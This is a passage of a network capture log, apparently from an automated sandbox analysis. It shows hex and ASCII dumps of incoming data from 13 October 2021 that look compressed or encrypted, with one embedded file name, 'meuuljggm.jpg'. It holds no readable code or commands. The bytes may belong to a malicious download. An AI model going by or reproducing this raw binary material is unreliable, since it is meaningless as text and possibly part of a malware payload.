2021-10-13 07:59:22 UTC	891	IN	Data Raw: 05 5a 36 62 ab fc ac 63 23 46 7d b9 8e 39 0d 1b ad 56 c0 ff aa ea 3e 15 e9 ee 0e f5 5a e2 77 38 bd 86 cf fe b0 63 cf fb 39 27 aa cd 49 60 42 dc c0 c6 a9 ae 1c 12 30 ef 09 f6 40 60 b0 18 e1 f2 e5 8d d9 c4 29 30 b8 6c 0f af ce a2 ea 7b 57 c6 19 1a d0 31 8e bc 34 71 10 db 51 aa 14 66 7a b3 83 1a 28 95 27 28 35 67 41 7b 47 2e 66 ab 0c bb dc a3 af d3 20 de 5a dc 94 b0 20 c9 4c 2c 3e e5 e4 c0 78 16 74 76 c1 68 07 39 42 9b 89 e3 dc a6 2c a2 ea ff fb 6c a1 d4 b3 b8 ed 54 15 59 50 c4 2c 5a a6 55 dd 29 47 29 af d6 8a 78 24 6d 1b 04 34 b9 b9 dd 4f dd 73 80 ba fb 87 0a db d0 1d 98 48 a0 85 db 5b 44 15 40 bd ba ea 38 9a 90 12 d9 d2 03 1a 44 df fd ce 5a 22 a1 ec b3 c2 87 ac 7c 0a 37 0a ca 82 a3 10 5e a2 03 e8 df a6 7a 69 a4 19 9d d7 ee eb 2f e6 9e a7 5d e2 bc 36 a5 9e Data Ascii: Z6bc#F}9V>Zw8c9'I`B0@`)0l{W14qQfz('(5gA{G.f Z L,>xtvh9B,lTYP,ZU)G)x$m4OsH[D@8DZ"\|7^zi/]6
2021-10-13 07:59:22 UTC	898	IN	Data Raw: fc b4 43 f3 17 6c 55 4d 2f 7a bf 7a 86 78 29 4a ef 6d e1 9c c4 a9 38 f2 6f 45 a0 27 81 bc a3 c3 64 bb 8a 52 11 3f 21 7e d3 7f 45 56 48 11 64 ab 87 77 56 6e 85 fd 16 1d 60 a5 4d 47 bf de 9f 38 17 51 ea 07 29 71 af 70 21 37 e8 48 23 0e 8d e7 92 b1 52 54 81 05 20 9f 79 ba f5 0a 88 b8 41 e9 8e 8a 3c ee e3 9a cf a6 25 5e d0 6c fe c5 bd 3d 1c 0b 28 9e 73 99 5c ef ee 92 26 f5 3e 84 4a 45 14 91 3a 19 66 7d c5 ef 53 cd d7 cf 72 12 a6 27 7f 07 42 15 2d 6d 84 fc 4e d1 91 3c 41 93 ec c7 ef 66 89 dd ec 75 1a ea bb cb 8b 19 65 0e bb 16 ef 66 a0 20 72 ed 41 59 49 4e 6e ca 22 e4 30 4e eb 66 9e cb 34 64 7c a6 e6 d3 66 e8 a4 df 4c b4 df e3 6e 55 4b b9 05 e7 78 50 72 02 61 64 8c 01 d4 03 b1 1c 85 5e d8 ba 3a 18 a4 8c a5 f6 d9 45 24 a1 4d f3 57 bc b8 9d 2e a8 bd 34 db e8 50 Data Ascii: ClUM/zzx)Jm8oE'dR?!~EVHdwVn`MG8Q)qp!7H#RT yA<%^l=(s\&>JE:f}Sr'B-mN<Afuef rAYINn"0Nf4d\|fLnUKxPrad^:E$MW.4P
2021-10-13 07:59:22 UTC	906	IN	Data Raw: e6 16 20 9c 9e 73 aa f5 b5 d0 b3 cc 8c 58 28 ad 8b 1d 40 00 31 f6 b4 cc 24 fa ea 55 76 85 3d 6d 42 9d 0f d5 57 d2 b3 dd af 1f 21 6b d3 2a 5b 7f ae a6 54 d9 53 9d 3e de 95 c5 d5 14 3a 1e df 22 7d be 29 04 56 4c 3c 28 d1 8d 70 0e d5 c3 06 d4 36 93 54 b4 72 9d c0 7b df 6e 6f bb 5a 4b ee 37 17 96 f8 be d5 bd 3f 16 b6 23 69 96 04 f4 f7 df ad e0 52 c3 b4 26 a6 22 be 38 7c 85 af df a9 ad 88 81 1a 94 c2 de b1 c9 46 ba b0 cd 6c 63 ff 86 6c 57 56 25 28 7b 01 84 d0 b4 7a cb f5 82 60 5b 0e 11 19 9c 58 7e 27 37 bc 83 ea 08 10 53 e1 74 9f 49 00 06 e5 ce 07 94 fd 54 e2 0f 56 ee 6a fe 06 35 14 64 de 33 08 e5 08 70 df ca 9b 4d 46 49 44 93 b9 14 e6 99 ac 53 49 a1 64 7c 13 c4 14 bf d1 2a b4 ff e8 8f 7b f3 c3 0e 6e a7 20 88 8d e2 3a 21 5b 5a 19 53 0b c1 6e f7 5c 6a 0a 1f a8 Data Ascii: sX(@1$Uv=mBW!k[TS>:"})VL<(p6Tr{noZK7?#iR&"8\|FlclWV%({z`[X~'7StITVj5d3pMFIDSId\|{n :![ZSn\j
2021-10-13 07:59:22 UTC	914	IN	Data Raw: 92 1d 2c 92 a5 73 57 ea 10 77 6b b3 97 c4 80 93 04 13 2c 4d fa a0 04 da 9b 5b 16 be 88 a7 6d 50 6d 29 4e af 93 96 b9 46 7d e9 4f 44 a4 49 5e f9 76 d0 9b e8 44 09 b5 e5 4e ee e7 d3 6e 32 e0 9c b7 ae ac 9f 7e b8 07 b8 64 91 de fb b1 fc 8a 7e 5f 49 fd 3b f2 91 c6 24 94 d7 98 67 db 4a e9 b4 4c b4 18 db 07 29 c9 aa 91 d3 4d 64 97 75 fb e7 57 69 79 c7 f4 a8 54 76 22 22 c5 d2 c5 96 5b e5 f8 14 21 a1 76 dd 68 8b f8 f4 a6 96 5e 78 0b dc d9 9f c5 3a bc f9 51 09 77 a8 8e ea e0 b9 79 73 de 07 1a 2d ce d8 c1 67 2b 6d 46 52 9c e1 e3 e2 4e e8 a2 f3 b2 3f de af 58 49 3b 45 ce ca 2b 1a 0f ce 38 c8 67 8f d9 50 bd 81 1f 4e c5 c1 0a 78 b6 39 f2 b9 02 3b d7 5b 13 32 5c 51 ab db 81 75 e4 a4 e1 00 b4 a7 24 75 23 ca 64 25 4e c5 66 74 90 d7 30 13 2c 64 e7 53 0e bf 9b 44 2a 54 73 Data Ascii: ,sWwk,M[mPm)NF}ODI^vDNn2~d~_I;$gJL)MduWiyTv""[!vh^x:Qwys-g+mFRN?XI;E+8gPNx9;[2\Qu$u#d%Nft0,dSD*Ts
2021-10-13 07:59:22 UTC	922	IN	Data Raw: 28 6a 5e 85 65 a2 66 a5 45 56 2f e5 9e d4 97 ef a4 94 fd 42 ea f4 5d 26 fd 2e 26 cd 56 a9 0c 69 c7 bc d8 6f e4 53 7e 57 20 84 99 ce b5 26 cf 5a 6e bf 72 57 77 a4 d6 74 3d eb f5 0f bc ad af 2b f7 e8 ea ab 3f 89 73 34 5b c7 0c c1 b1 35 75 f4 1f 3d af 58 cf 0b 5e 1d 51 f3 71 42 d5 72 78 20 72 e0 76 08 13 0d 4a 41 7a a5 b6 7b 52 77 66 6f c0 d0 ea e1 8a 1b a0 31 9d d0 5d d7 05 93 b7 b0 19 c4 f2 3b bb e0 9e d4 32 21 53 58 55 87 22 48 8a 2c 0c c8 a5 07 86 13 30 62 12 3e 81 ae 59 d7 c2 9a 96 22 af 19 39 78 ae 01 4b b2 76 f5 a4 bf d2 0b b8 a8 fa a1 16 fe 75 03 47 b9 c5 7d c6 51 cb 77 15 64 15 60 d4 e4 5b 0a 73 c4 14 9c 2d 29 4d 6a 60 4d 0a 46 92 79 28 ae 45 21 35 7b 34 af bc 82 fa 93 2f 4e 45 50 08 4a 9a 8c 0b 52 61 0f c1 40 89 56 e3 d8 e4 7b de e5 5f 14 7f 4b 80 Data Ascii: (j^efEV/B]&.&VioS~W &ZnrWwt=+?s4[5u=X^QqBrx rvJAz{Rwfo1];2!SXU"H,0b>Y"9xKvuG}Qwd`[s-)Mj`MFy(E!5{4/NEPJRa@V{_K
2021-10-13 07:59:22 UTC	930	IN	Data Raw: cf d3 11 cc 45 6b db 68 38 54 e5 3e f0 6a 04 6a 0a f5 d3 9a bd f3 73 8b 46 8b 13 51 e7 fb ab cd 0d a2 0f 32 ea 70 d5 a1 72 84 81 34 ed ad 7c 7c c1 34 fc 80 29 37 09 98 34 a3 63 a8 6d 82 00 a4 fc d9 c5 c5 e4 7e d0 87 43 77 71 eb 46 f4 f3 e2 c6 24 4a ec 79 35 23 c0 db f9 7f 6a 8d b0 94 10 a2 66 06 dd 63 9c 4f 7b 39 7f 65 1f b0 e5 ef 54 59 e9 1c e7 90 61 54 4a 91 dc 59 1a c5 48 1e 78 f0 89 b0 dc 47 6c 79 ed d3 3e f2 3a 8c 5c 6d 45 1e 78 9e 6f 28 e1 92 da f8 df 4a 63 d3 c9 9a b7 79 28 f3 e7 23 dd 21 be 6c c7 87 7a 76 3a 8a bd fc c8 36 0a 65 6a 82 b1 b3 a6 a3 fb 4d 61 1e 9c 61 25 3a ed 42 f1 26 33 b6 32 e3 4f 36 29 51 02 bf 8d 32 d3 43 94 62 55 4f 55 ab b2 71 e0 97 f7 d0 0f 6f ff 0b f7 c3 bf 50 81 34 bf 93 74 38 80 45 98 85 e1 77 1d e7 ad d0 ba d5 cc 05 2f 2e Data Ascii: Ekh8T>jjsFQ2pr4\|\|4)74cm~CwqF$Jy5#jfcO{9eTYaTJYHxGly>:\mExo(Jcy(#!lzv:6ejMaa%:B&32O6)Q2CbUOUqoP4t8Ew/.
2021-10-13 07:59:22 UTC	938	IN	Data Raw: 91 7c 5f d4 b3 db eb 7a e2 7a 9b d2 85 d6 24 d0 c4 46 c3 e9 01 a5 01 ab da 38 ed e3 40 1a 28 70 92 21 4e e4 a8 ba ce 89 c4 e1 2e 59 1e c3 0e a1 cc 60 65 3b 92 0e 48 4c 20 c4 86 74 ec 8c 73 d8 a2 15 5c ea c1 9b 77 09 58 52 1f 2c 97 f8 0d 81 6a 62 2a 90 e4 bd 4d 57 93 63 4d 01 81 b7 ba 84 c4 7f 9a 54 45 51 51 41 e1 98 c0 9d f1 16 62 ed b9 24 2e 39 8d 54 d1 fd a7 4c 8e a3 b9 3f d2 2e 0c d9 12 50 40 ea c7 4e 73 2d c5 32 64 71 09 9c c5 a8 ee a5 dc 64 67 59 03 53 af 9c a2 49 be 91 c0 cf 4c 5b d4 d0 a1 aa 44 a6 91 17 36 74 88 af 86 21 61 08 bd f2 65 02 53 80 59 f1 e3 db b0 cb ea 17 38 60 b8 ca df 6c 45 cb 6a 40 a7 84 fe 16 f3 e5 29 53 79 39 71 4b f0 51 76 9a 75 c1 f2 c9 70 53 4f ba 01 24 1a 8b 47 0b b8 7a a6 8f 1a ff 72 6a cc 69 ba e2 67 f6 a7 ea 7e 49 97 52 3c Data Ascii: \|_zz$F8@(p!N.Y`e;HL ts\wXR,jb*MWcMTEQQAb$.9TL?.P@Ns-2dqdgYSIL[D6t!aeSY8`lEj@)Sy9qKQvupSO$Gzrjig~IR<
2021-10-13 07:59:22 UTC	945	IN	Data Raw: e1 5d e4 34 01 c9 33 6b 70 2e 79 19 5d 78 42 f2 32 db 00 c1 f9 0b e4 05 6a e3 33 e3 3d 4e 6c 7e 0b 35 f4 d2 32 07 31 31 62 df 36 79 43 c7 77 3a 0d 50 76 d4 ba 3d f2 a5 cf bb cc 9b ca 98 4a c1 84 02 81 b6 b7 dc 7a 4c 4f 84 f2 93 e1 d1 6f 7f 93 c7 7d 09 30 cc c2 98 fe 7c ab 3e d0 7e f1 7f 1f 1c 3f 0a 66 42 25 32 99 4d 9c 32 73 79 50 50 ff cc 0c 8e 7c 17 8e 73 cf be 3f db 61 11 b6 6d 36 48 f4 8e 89 4e 8f 95 8b 49 66 cb e8 0b 7c 87 30 92 d5 1b 8c 59 f7 7a a7 b7 b0 86 96 a8 23 b6 ce d5 1b 3c ec b4 46 0f 7f c1 2c dd 6b 64 0b d7 e9 83 ba b0 63 60 42 9f 87 57 ef 95 4b 39 41 e7 0d 0a 36 50 35 2f a2 7b d1 fe ef 86 75 45 04 d2 5b 46 c4 63 73 d6 98 b5 33 31 62 b4 59 7c 0b ea 23 b7 da bb ad 71 bd 2f c8 8b ee 57 fc 4b fa cb ff 05 c8 db 64 66 34 0a 87 76 f2 77 e7 bf f4 Data Ascii: ]43kp.y]xB2j3=Nl~5211b6yCw:Pv=JzLOo}0\|>~?fB%2M2syPP\|s?am6HNIf\|0Yz#<F,kdc`BWK9A6P5/{uE[Fcs31bY\|#q/WKdf4vw
2021-10-13 07:59:22 UTC	953	IN	Data Raw: 62 be 10 fc 4c 20 54 9e 48 0a 6a 4d e9 e1 b5 9a e8 98 b1 67 f6 8d 22 97 fd c3 0d 9b 42 5f e0 d8 6a 64 62 0e c0 b6 36 10 20 18 ff 75 8d 04 a3 0b 79 24 cd 3c b4 69 5e b9 12 b4 1e f9 11 20 68 bd 5e 43 bf 52 93 e0 d7 74 64 d4 e9 45 9d f4 c8 bb 57 00 8d f5 08 b4 97 63 be d7 12 b4 2f ba e0 4b 3b bc d7 45 6b df 44 cd c9 0d cf 63 f8 1a 25 c7 81 f0 0a d5 86 74 97 ad 35 f8 be f3 f2 33 26 c5 cb f2 8c 98 dd 51 62 24 c0 f8 e1 8a 41 e9 e1 1b 4c 25 c9 86 32 a1 76 3e 5c 5a 32 70 30 8f df eb f8 26 08 e7 f6 df ad 01 bc 9c 4c d0 88 40 bb 2e ab 0d f8 1a fe 1e c1 4b 9d bb 77 6f 53 de 72 51 c4 8e a4 3b fc df b5 ee 19 da e8 c8 2e 1a 50 29 84 fb a2 52 18 6b e2 25 bb 77 0d 2d a4 f8 8a b3 f6 f3 0b 1e 5c 53 e9 08 77 ae b4 03 b9 4d 1f 3c 74 8f 9d 4b 59 16 45 29 5c 8a 36 2d 44 66 c4 Data Ascii: bL THjMg"B_jdb6 uy$<i^ h^CRtdEWc/K;EkDc%t53&Qb$AL%2v>\Z2p0&L@.KwoSrQ;.P)Rk%w-\SwM<tKYE)\6-Df
2021-10-13 07:59:22 UTC	961	IN	Data Raw: a8 f6 c1 bc b0 de 0d 8e e2 6f 60 78 e0 fa a9 89 53 00 0f fe 48 de 9e ee 7f 6d 3c 39 de 91 bf 88 dd 6c 4c 87 ba ad a2 5e b7 0c 62 05 a6 76 eb 67 ea 29 2f 84 03 e8 da 18 0f 9c c8 26 69 36 50 03 38 63 01 cd f3 47 2b 78 dc d6 78 6d 49 f0 eb 65 84 47 12 cd e3 63 5b 33 47 e8 9a 5f a6 85 23 26 6d 43 1e 8e bf ab 7a 1c 96 b6 6a e9 99 1e ee b5 c4 32 fc a4 5f 64 bf e1 5f f7 af 6e bf 92 bc 8e e9 0b 9b 0f b5 61 28 eb 57 50 8e 08 83 62 dd b6 57 df 4c 81 17 b7 c8 a6 f2 92 8f b2 10 11 8f 74 06 05 f2 09 71 7a 5e 28 d6 d2 18 ba 78 ba ac 1a e9 bd 95 be f5 c6 db e9 72 55 5e b8 9d 92 76 62 6a 57 69 d5 a7 e1 3e 85 64 ed 8d 38 fe ce c3 e9 73 6d ec 1e 1b 71 6f 86 a8 a7 c2 d3 8e 5b 56 f6 ab e1 56 1d 22 a1 f1 0d 08 f2 12 33 65 3e 43 c0 56 ce 37 e1 1e fe e5 de 6b 1c 5e fd ed 56 fa Data Ascii: o`xSHm<9lL^bvg)/&i6P8cG+xxmIeGc[3G_#&mCzj2_d_na(WPbWLtqz^(xrU^vbjWi>d8smqo[VV"3e>CV7k^V
2021-10-13 07:59:22 UTC	969	IN	Data Raw: 10 6e 9f da c7 bf 54 5a 87 fd c4 e7 48 e3 d1 53 35 10 71 18 80 26 d9 a8 ea f2 ed 75 2b f3 08 86 06 bf 45 02 9c 07 c1 d5 76 5d 2b 82 c4 cb 85 b9 27 f8 b5 ae ca d3 3d e1 a8 74 ea 43 40 71 e1 c1 3d c6 81 cb 73 ca 3a b2 fe e7 94 24 73 e5 06 cc a8 ce 29 66 ae 54 f0 a1 95 1d 23 f0 6a f9 e5 e1 41 d7 75 52 68 bc ab ef f7 ad 71 e0 95 1f 29 4b 0c 6e 25 db e4 53 31 b8 6a f5 93 d2 39 cd be 69 b7 06 b0 80 dd 79 10 25 71 5f 01 20 6b 6d 0a bb d1 4f 97 60 ba 54 43 ff 16 70 d7 aa da ab fd 7f 66 96 b2 5e 2b f8 f8 6b 62 ca 91 46 c5 42 ee 66 a2 14 33 ed f5 b7 0c ae 92 ef eb fb 66 f9 fa 0a 9e 88 db 34 4c e1 5c 93 f9 03 f9 d4 60 a7 f1 3a 12 ec 7e a1 f9 f3 46 5d 1c 17 44 0c b0 c6 63 bd 68 72 fd 1d ac 73 37 42 b6 9a b2 f7 7f 95 6b 8c 02 fc c6 07 17 a1 94 4b 3c be 85 16 bb 45 ff Data Ascii: nTZHS5q&u+Ev]+'=tC@q=s:$s)fT#jAuRhq)Kn%S1j9iy%q_ kmO`TCpf^+kbFBf3f4L\`:~F]Dchrs7BkK<E
2021-10-13 07:59:22 UTC	977	IN	Data Raw: 88 dc db 62 e6 ab ca 62 0c ca 3e 86 16 57 25 01 66 b9 03 36 29 ad d2 5f 64 45 60 51 97 68 3e 7c f9 3f 71 f0 44 ea f4 18 e4 90 54 dd a9 2f 1e 84 c5 f3 bc 46 01 90 c5 cc 6b b8 75 2c 6e 3c 59 ca a9 7e d9 4a f5 aa 12 ca 5f ae 52 bd 79 fb 03 f6 27 ec 8f d9 9f 59 26 a5 3c 75 2b 28 9c c8 f7 60 a9 7a 3e 10 ae fc 8d 0e f0 a8 77 c2 59 43 7a f4 59 5d cb ec 3f e1 13 e6 52 22 bb c9 cb ca ce 86 d7 65 1f 35 89 14 99 0f 26 31 cd f2 f7 80 2e f9 cc 4e 26 a5 bd e1 55 31 30 88 33 2d 9b af cd 8e c0 c2 d5 fd aa a4 b0 8c 06 6e 19 68 88 5c 87 e8 9b 1a aa c9 dd ac 27 35 b0 86 e7 ea a9 eb ea e1 bc 26 aa da c8 7c 62 8e 05 75 b0 01 dc 6f 30 ad b1 7c 3f 86 ca 6a ab ed 9f be 0b a2 6a ab 1c d5 8d d7 f3 d7 49 77 17 6a d5 5d 6a 43 06 f0 22 7d 01 42 b1 d9 5d 2f 98 20 01 51 cb e0 b5 2d e0 Data Ascii: bb>W%f6)_dE`Qh>\|?qDT/Fku,n<Y~J_Ry'Y&<u+(`z>wYCzY]?R"e5&1.N&U103-nh\'5&\|buo0\|?jjIwj]jC"}B]/ Q-
2021-10-13 07:59:22 UTC	984	IN	Data Raw: 22 40 c7 cc 6d 44 48 1a d4 90 4c d1 14 d5 b4 67 26 74 40 d1 4e ba 94 20 67 22 5d 11 f4 96 74 08 41 12 a8 c7 57 45 15 ca a2 29 d1 46 26 99 b6 61 d2 8c a2 ae 2c 9e e6 93 6d 13 26 ed 6c f2 20 6c eb 5a 8b 69 c4 e0 05 19 99 a8 37 b7 29 c3 62 5c a2 dc 5b 0b 00 e1 7c 01 8a 56 1e a8 63 16 41 20 d5 6b 4e 9c 73 e5 a0 86 c6 9c 8d 77 89 4e 08 26 40 42 bb 76 ab 56 8b f1 2d 6b e0 b8 35 a6 14 b6 00 54 60 74 5f d1 4a ae ec 9b b3 53 06 72 a4 6b b8 a7 4d c7 aa 75 b9 8a 4b 64 d4 22 9e 42 21 0a eb cb a6 4c 0d 7b 34 e9 9a 52 cb f2 34 72 32 32 8c 31 a6 b8 c1 6b 83 5a e8 99 f4 d5 94 dd 9b 9a d3 f1 98 28 95 20 0e 33 88 57 68 db d3 4d 1c d8 be 73 17 44 f2 9e 4a ed 3c 9c 2c 95 76 8d a7 98 c7 3a 55 e8 86 2e 53 51 46 6b a4 d1 cd 6b ad 54 49 8f 14 e8 10 e1 99 54 6a da 10 ae b6 4e f3 Data Ascii: "@mDHLg&t@N g"]tAWE)F&a,m&l lZi7)b\[\|VcA kNswN&@BvV-k5T`t_JSrkMuKd"B!L{4R4r221kZ( 3WhMsDJ<,v:U.SQFkkTITjN
2021-10-13 07:59:22 UTC	992	IN	Data Raw: 60 67 e7 e4 a9 5e bb 5e d9 7d 8a 1c 6c 8d 47 60 17 0c 85 d3 91 ef 40 8b 61 93 e0 61 b5 2c 37 36 5d 86 f9 76 e9 2b 8c 4b 1a 6e 89 c0 26 49 3b 45 8d b3 5b 49 25 81 02 9f a8 07 2c 59 b9 f0 a3 06 29 12 1d 98 cc 1b d4 1d 98 19 75 04 db 47 64 1d b1 1d 1a 11 ea 93 4f 03 51 30 33 34 b6 54 08 c2 8d 87 5f cb 7d 4e e6 08 5b 1a b1 4e 0d 9a f6 40 4b 0a f3 94 92 05 11 ae 49 ba 41 b6 6c 59 1f 6c cc cd b2 c5 41 1d 6e a6 e1 5a 9a ee c9 09 4b fa 37 2a df 47 a9 68 32 52 e3 ce a1 55 9a c1 0a 8c 0c 36 b6 d3 41 d9 a0 81 99 a8 4a 10 d5 2d fa e0 0d a4 55 3e 07 74 c8 2a 5a 29 d6 d5 14 eb 34 37 19 24 cb d2 57 bc 12 1a ad 86 11 6c c6 1b 58 e0 0d 36 82 be 27 c7 12 18 fd 10 42 d4 e5 71 ae dd 46 4e 28 b6 fe 2b 52 44 08 53 25 5a 7e a4 e1 d4 86 3f 6c 71 32 07 21 42 2b 68 72 18 1f 87 e8 Data Ascii: `g^^}lG`@aa,76]v+Kn&I;E[I%,Y)uGdOQ034T_}N[N@KIAlYlAnZK7Gh2RU6AJ-U>tZ)47$WlX6'BqFN(+RDS%Z~?lq2!B+hr
2021-10-13 07:59:22 UTC	1000	IN	Data Raw: 5f aa a0 62 3e be 32 cc 59 1d 0a f1 ea e6 93 be 4a d7 f1 5a bb c6 6d c3 25 ad 7e e6 b4 98 ef 7c 92 34 77 67 64 59 d8 78 97 33 54 50 ac 60 f0 6d 80 e3 e5 d9 61 ed 09 11 b5 09 52 a4 33 55 01 b6 d4 66 1e 8d 78 69 63 26 27 9d 94 16 a6 0f a0 41 ad a7 19 91 d1 f0 21 51 bc 5e a8 fc 8e 19 b1 10 41 96 d3 2e 7a 01 a3 57 99 8b ce 07 8d af fc 95 1f 63 71 a4 bc de 6e 56 a7 80 58 72 91 13 da f5 d8 64 ee 09 88 9b 57 9c 75 bd 68 11 11 f8 66 4b 9e 08 b7 b4 26 9c 57 b1 6e f1 89 60 cd 1c cc 33 6f c8 e6 d2 5c 56 69 80 55 53 c2 7e d8 68 22 e1 7c 31 d4 a0 2b 96 e5 e8 ca ca 24 d2 16 0b 8f 63 66 44 ca 1f a9 80 4f 95 86 83 1a d5 a6 72 aa 66 86 98 51 ab 61 56 d8 87 79 b6 6d f7 e0 09 97 90 d0 b3 09 5c 94 ec 47 ad 4c 8c 41 1c 86 7e 5f 07 0e 5d dc 6e b6 cc cf 1a 90 0e 9b 3e 93 7f 81 Data Ascii: _b>2YJZm%~\|4wgdYx3TP`maR3Ufxic&'A!Q^A.zWcqnVXrdWuhfK&Wn`3o\ViUS~h"\|1+$cfDOrfQaVym\GLA~_]n>
2021-10-13 07:59:22 UTC	1008	IN	Data Raw: 5e b0 33 9b 00 e2 66 11 19 f8 e0 e5 9c b2 df b3 1b 85 2d cc ea 48 9f 41 f3 2f 15 1c e1 08 71 4a 0a 2a 1f 97 5e 36 76 3d 9d 8f 4c 8a 03 7c b5 27 42 a6 b6 71 0a 38 56 4f d7 1c 4c 53 d0 38 cb 74 b4 48 d3 00 7c c1 c2 5b 7a e3 2d 2c c0 13 5a 8e b1 ce 3e 39 be b8 b7 87 d1 78 8a a7 53 24 e3 b3 52 78 28 71 d8 7f 2c e9 46 ad 9c 78 cf 39 36 be 3d 94 55 29 fb 37 1e a5 a1 d3 85 1f 5d 77 22 e1 e8 80 ce d5 81 62 5a 99 90 43 be 96 55 3f 9c 98 e1 18 f5 3b 77 11 e0 99 15 80 ca 75 ad c2 bc 9e 17 2a 11 ac 6c c3 64 1b ed a8 2c 7c bd 02 8e 20 2b de e1 dd 4d 15 3c e3 a2 07 69 09 c8 75 36 c8 36 90 51 13 b2 61 24 16 93 5f d9 44 c9 57 e1 f1 3c 63 25 56 f3 9c c4 06 98 de 83 f5 71 a1 85 e8 d3 0e 51 16 cd c3 ab b8 e2 a1 e9 8f 7d 47 de 5e 63 12 af df 1c 6e ca 8f 63 c9 5e 8b d0 24 32 Data Ascii: ^3f-HA/qJ^6v=L\|'Bq8VOLS8tH\|[z-,Z>9xS$Rx(q,Fx96=U)7]w"bZCU?;wuld,\| +M<iu66Qa$_DW<c%VqQ}G^cnc^$2
2021-10-13 07:59:22 UTC	1016	IN	Data Raw: 46 b0 d1 a6 04 83 26 38 4c 84 c0 81 08 01 06 4e 1b ec 61 38 93 c6 1c 68 3d 92 c2 26 6c c8 04 fd c0 c2 a8 91 f5 e6 13 d0 ba ec 39 d0 bb b1 87 39 6c 50 4c 37 a7 2f 7c fd 98 e3 df 3e d9 7a 85 3b 7e b5 8c 5c 0d 81 37 05 e3 46 43 45 af 9a 33 be 18 a0 34 8d 19 45 b8 01 ec 44 6b de 3b e2 16 10 a7 f7 26 33 d4 37 0f f0 63 27 72 8e 63 bd 38 ed 91 90 a3 a1 64 c4 93 d8 03 45 54 93 8b a3 52 c2 64 ed 96 c7 7b 6e 07 62 04 c0 fe ee e9 30 37 7a 84 7d 91 c8 ce 2c 67 2a a3 38 b3 36 ae 8c d8 d3 37 fb d6 1a 69 33 45 ba 1d 33 86 9d 19 99 93 34 e5 1a 26 37 3d 54 79 d5 81 7a af 5f 15 3f 57 af ea bb 35 5d aa df 6e ab b9 55 dd aa ef 54 f7 ed ed 91 7e 1e 3a 37 0c 45 72 7c 13 06 d9 a6 aa 37 c0 92 5f c8 10 d7 a7 03 c7 20 51 8f 2c 7e 7e d4 49 88 28 ae 1c 66 09 90 98 10 21 00 89 a9 6c Data Ascii: F&8LNa8h=&l99lPL7/\|>z;~\7FCE34EDk;&37c'rc8dETRd{nb07z},g*867i3E34&7=Tyz_?W5]nUT~:7Er\|7_ Q,~~I(f!l
2021-10-13 07:59:22 UTC	1023	IN	Data Raw: e9 08 52 d8 14 08 05 c9 4e 6e 0a 4a 85 ec c1 46 c7 48 6d 00 27 97 3d 40 3a 2e f8 1a fe 32 e6 44 0a 66 90 09 35 04 a8 04 c1 a1 72 8c b6 b1 78 77 60 a9 b6 26 38 ac 79 36 d8 be e3 f0 1f 1e 2d 67 16 a2 f2 0f 5d a2 9f 66 87 a5 f9 0c ce 03 47 c3 e0 1f fd 57 9f b2 3a 6e 22 04 15 95 00 1f 0e 82 e0 5b 87 a0 6f aa 14 ba 85 1c 93 11 fb 63 2e e0 0c 82 cd 7d 64 59 24 6f 5e 49 8c e1 c2 77 68 2b 5e 63 37 c8 bc 68 b5 85 4c 70 5b d6 77 55 7f d0 8e 89 df cb a8 ea bb 06 a5 57 43 f3 9a 3c 27 fa 44 7b b5 00 34 bf f5 c9 d6 5e 42 0b e6 d4 63 3f 6d 1d f3 89 d1 16 ea 68 8f a6 c8 f6 1d 1d 64 72 8a 5b 52 ae 99 d6 aa 97 c3 63 15 29 98 63 d4 50 6d fd 7b 96 90 e1 d1 40 82 9d b9 ce 8d 44 47 18 be b9 24 ec 6c 54 25 db 47 9c 29 5e 93 5f 77 be 53 c0 3f 40 8f 5c a6 3e c0 24 3b de 4f ee b5 Data Ascii: RNnJFHm'=@:.2Df5rxw`&8y6-g]fGW:n"[oc.}dY$o^Iwh+^c7hLp[wUWC<'D{4^Bc?mhdr[Rc)cPm{@DG$lT%G)^_wS?@\>$;O
2021-10-13 07:59:22 UTC	1031	IN	Data Raw: 0f 2f 24 5e ba 12 07 84 69 92 a7 00 44 3f b2 ea 07 44 e5 c3 37 27 3d 76 6a 0e 4b 99 70 42 0a 34 04 9e 53 01 47 6b 15 8d 4a 82 04 d7 0c 18 14 27 0e 01 56 d1 62 42 6c 96 44 00 5d 9f c0 06 bb 51 05 21 8b c3 16 b4 40 37 6e 55 4a 25 6c e2 57 11 60 83 5b 0b e9 eb ea 6a ac 7e e4 4a 07 19 41 ae 2f 5e 7d 90 2b 6f 9e 38 da bc aa 89 de f8 ba fd da 35 2c 0e a0 d9 84 24 1a a2 49 95 ea b7 36 6e a9 62 bd 37 ac 8e 7b b5 66 9e d2 b3 74 ac 49 da 50 ad 9b f4 b5 b0 19 e7 d4 66 d1 25 e2 2a 53 8c 9e c6 45 8a 3e 4d cd 9b 5c 61 f8 d8 12 ea 8c b6 ae 26 77 e1 49 ca f3 83 61 56 b3 c9 de 17 59 16 a9 4c 57 32 bd b6 17 14 6b b0 01 95 11 1f ae 51 9a 85 4e d6 ad a3 d5 d4 c2 a9 71 d5 44 dc 2b b6 73 f0 e5 3d d3 f9 a7 f1 e1 29 0b a9 49 cd 7a 5a ce 28 4e 27 8f a6 dd aa 03 4e 33 56 65 9f 8a Data Ascii: /$^iD?D7'=vjKpB4SGkJ'VbBlD]Q!@7nUJ%lW`[j~JA/^}+o85,$I6nb7{ftIPf%*SE>M\a&wIaVYLW2kQNqD+s=)IzZ(N'N3Ve
2021-10-13 07:59:22 UTC	1039	IN	Data Raw: f6 1b 68 76 ea 1f 0d 0f d1 d2 a9 bb 38 7e 61 60 ab ab 91 dd 34 5f 8d 21 17 35 62 dc f4 26 08 d8 86 a2 f2 56 b0 1c 4c 23 39 83 3b b3 45 b0 63 b0 82 52 e2 f7 67 49 e5 ec d0 9f 5e 0a ba d8 30 c3 81 aa 47 85 04 b0 f9 fc 8f 59 29 02 03 0b f1 03 04 e0 04 20 69 8a bf a0 80 43 00 0d 6d 65 75 75 6c 6a 67 67 6d 2e 6a 70 67 0a 03 02 a2 cc fb af d0 bf d7 01 ce 78 ed 01 56 64 44 22 45 f4 40 54 f7 ef 39 dd 2f 59 bd 16 d5 03 a2 03 6a 02 db e6 08 a0 38 01 c1 68 23 bf bb 71 7a 8e 79 ca a9 88 89 fe 35 2c c5 4c 55 4e 1a 99 9f be d3 ea a0 a9 b0 e9 f5 97 96 f8 7d dd 43 3e 7e 1a 84 2c ab c7 51 b3 62 27 ab d6 49 a2 e7 a1 f2 b1 cc a8 5a b8 9c b9 ff 55 d3 6c 3d 29 f8 5e 19 4e e9 f0 e3 75 f1 4e ea fe c9 ee c8 1b 59 0c 8e ff df e3 34 bc b3 9f 7e dc 14 8d 